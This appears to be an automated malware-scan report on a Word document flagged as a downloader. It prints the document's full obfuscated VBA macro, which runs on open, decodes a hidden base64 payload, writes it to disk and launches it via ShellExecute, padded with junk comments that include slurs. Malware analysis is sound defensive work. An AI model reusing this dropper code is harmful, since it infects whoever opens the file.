Verdict: MALICIOUS
Risk Score: 190
Heuristics: 6

- ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
- VBA project inside OOXML [medium, OOXML_VBA] (3 related findings): document contains a VBA project; VBA macros present
  - Potential Shell call in VBA [critical, OLE_VBA_SHELL]. Matched line in script: Dim ai8TV As New Shell32.Shell
  - CreateObject call [high, OLE_VBA_CREATEOBJ]. Matched line in script: With CreateObject("Microsoft.XMLDOM").createElement("b64")
  - AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched line in script: Sub AutoOpen()
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7267 bytes |

SHA-256: f263ca4298467105c53196f37ad7089c4c394f764610e5d1d06b0512aa568e1a

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{D6546787-7200-47A1-8C71-9180381DFED5}{E0EFE643-A124-4FD6-AF76-2FBC010A2BE8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "axmdR"
Sub AutoOpen()
' Intensify fag flat friends
' Whose newer forgetful uzbekistan
' Strips pies lavishly
' Loafer stated
Call aiGml
End Sub
Sub aiGml()
aVI3oy
End Sub
Function a5mtiD(aTcA8)
azwPNu = ""
For a783Mh = Len(aTcA8) To 1 Step -1
azwPNu = azwPNu & "" & Mid(aTcA8, a783Mh, 1)
Next a783Mh
a5mtiD = azwPNu
End Function
Function a8sImz(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
.text = b64
b = .nodeTypedValue
End With
a8sImz = StrConv(b, vbUnicode)
End Function
Attribute VB_Name = "aNYIu"
Sub ax57JP(aK5rL, an6T32)
' Couple sedition re- apprise
' Girth meaningful tour
Set auSLK = CreateObject("Scripting.FileSystemObject")
Call auSLK.CopyFile(aK5rL, an6T32, 1)
' Oman lewd
' Batteries blame shark
' Paucity rob frozen muslims
' Miser counterpoise replace sq wins
End Sub
Sub aZYQ8D(a4B5z, a2iHw4)
' Beacon sip price bangladesh
' Radiation regions eocene
' Pencil diver defraud container
' Emphasize immature observable milfs
' Give closely beacon
' Foreword contraction
' Described
' Reunion ascii hr lecturer tobago
' Dividend consolidate sculpture
' Give cottages
' Loom fifty-five pf cafe
' Clandestine assam communist analyze
' Incorporated plaza
' Esperanto
' Transplant double slug
' Simile sierra announce
' Substratum despicable swiss donna twisted penmanship firefox hop
' Unconvinced abdicate manor
' Sodium pickup conjugal celibate excel
' Lost supplant
' Youthfulness
' Connexions savour viands voters ripe
' Andrew reg
' Crackle northwest scow
' Debasement appraisal
' Bigamy
' Tremendous
' Organic solved
Open a4B5z For Output As #1
Print #1, a2iHw4
' Mo knickerbockers vacuum
' Affordable bookkeeper
Close #1
End Sub
Attribute VB_Name = "a0n1U"
Function a2POb(aX6my)
' Furtive indus believes
' Jovial declension scheduled
' Thrown dilate medicaid smear
' Supernumerary excitation skunk
' Intercede theologian
' Clusters mentor discounted refine
End Function
Function a7zJH(asxyt)
' Ap
' Fleece advertised dimensional proboscis
' Submissive renaissance burly genealogical
' Accommodating cambridge constitutes expiate albumen
' Episodes circumstances suicide
' Musician sot pouch nag
' Comic cumbersome nr
' Kids proposition cognate tasting
' Pan tone salaries
' Upheaval canto
' Textbook parallel stitching salem
' Partial hartford passover notably
' Contains dregs poster dank
' Married lindsay
' Excel
aYRDrj = Split(a5mtiD(frm.paths.text), "|")
Select Case asxyt
Case Is = 0
a7zJH = aYRDrj(0)
Case Is = 1
a7zJH = aYRDrj(1)
Case Is = 2
a7zJH = aYRDrj(2)
Case Is = 3
a7zJH = aYRDrj(3)
End Select
' Realized
' Either decrepitude
' Gentleman arising hindrance beautifully voters
' Sin unrequited julia muffin
' No ilk
' Explain concierge sweet causal heavily
' Brunette symphony martha ethnic
' Jun
' Flickered voyeur wanna theories tribal
' Cute drain harper
' Enlist ingratiate
' Gregarious boc primacy qualify psychologist budget others woodsman
' Accompanies
' Branding rancid stages mercedes seashore declamation book aqueduct
' Extras aesthetics craftsman mixing gary conversely
' Tgp octavo changes acknowledgement marcus
' Hugo extended
' Remain reasonably transference norton
' Improvement cyprus vowel
' Leads charon entertaining
' Lama hasan
End Function
Function ar9sv(aZ8lj, aSTi5)
' Onlooker phonograph
' Depravity fatalism prospective inc.
' Dispute teams exemplary ak rhubarb
' Lung decorative
' Bacchus evacuation ravens stan
' Devices four conditional
' Ibrahim whipping wedge
' Navigating fired operation
End Function
Sub aVI3oy()
ajCvZ1 = a7zJH(0)
aYP80 = a7zJH(1)
ayUBnL = a7zJH(2)
aS45gm = a7zJH(3)
' Swans
' Compatible slug mic second blocking
' Chronic such dogged outlay louise politicians
' Shut justin
' Mustang arizona wells vibrator wane
' Gloucestershire priority
' Dowager
' Grenada lyrics celebrities plaint preoccupation
' Pulsation
' Bearable etruscan negligible
' Remembered mandolin sirup
' Sloop communal eye-witness sims
' Women generated
' Centers beguiling
' Reservoir johannes journalism
' Tapers
' Commands alchemists
' Braced unconcealed
' Cooking
' Vellum clockwork pursuant reform
' Specialty racket syringe peter
' Fleece syracuse ogre neville
' Weeps pneumonia
' Funds
' Craggy pants eliminate wend
' Editorials jocular earn declamation
' Jp edinburgh
' Fifth daily experiment melee psychic
' Accomplishing corse feasible friday
aUNnRS = a5mtiD(a8sImz(frm.pay.text))
' Spoken msn
' Chinese chorus wally xi
aZYQ8D ajCvZ1, aUNnRS
' Guiana notation half-brother spiritualism
' Eel
' Astronomy
' Eyebrow throwing abyssinia abduction
' Bedraggled owned cancellation
' Massy category compute telescope ripen
' Tenable
ax57JP ayUBnL, aYP80
' Insecure detention transformation
' Roster
' Attacked drawings
' Devon carey rambling
' Mongrel instructional
' Scholarships remove yarn cyprus
' Seaweed malign hold
' Th updated eat secede apposite
' Philology islands mash
' Tenets
' Opaque advisability servers lace
' Suck ores loftiness remember markers
' Damages pineapple pill
' Eyelid albania f planetary blowjob v
' Tumor dictatorship immaculate offensive loath
' Dick hatter min contralto
' Coffer smart nondescript
' Yeomanry conflicts
' Primer
' Bastion vane settings
' Confidentiality dissipate purposeless dominica trigger playstation
' Sponsor full saturnine mackerel groundwork alf suit
' Deflected leo orchestra sneak
' Admin
' Transition astute organize defines
' Infringe expect
' Uw cyprus beetle overhung
aUKcA = Chr(34)
aCO1cl = Trim(aS45gm & "t : " & aUKcA & ajCvZ1 & aUKcA)
' Nuclear tourists fact fan insincere
' Phoenician advisability
' Rotunda unsaid talmud undefiled working honest
' Tariff chichester knob mentor
Dim ai8TV As New Shell32.Shell
Call ai8TV.ShellExecute(aYP80, aCO1cl, " ", SW_SHOWNORMAL)
' Yank tide backing
' Lord bath write tickle his fruit
' Dint intro innocuous
' Rubicon racy captor
' Inquisitiveness institutional occasions meets fu terrifying
' Telecommunications inter
' Viewpoint hepatitis solving skein
' Triple rousing methodology
' Ve tgp tannin
' Porpoise suit select market capability normans
' Rimini acceptation of
' Dulcet lancaster
' Eclipse revert perception obituary wilderness
' Erosion plum anatomical bulk
' Marcus tags self-possessed road fisher
' Atlantis analytic
' Stops sen abstaining
' Lewes solutions luther treating
' Examples stimulate
' Races wharves charitable bespoke enrollment
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 39424 bytes |

SHA-256: 0e227300645643173dfbfd6f566f8fad07b060e7b667698afcb602d43e10fd08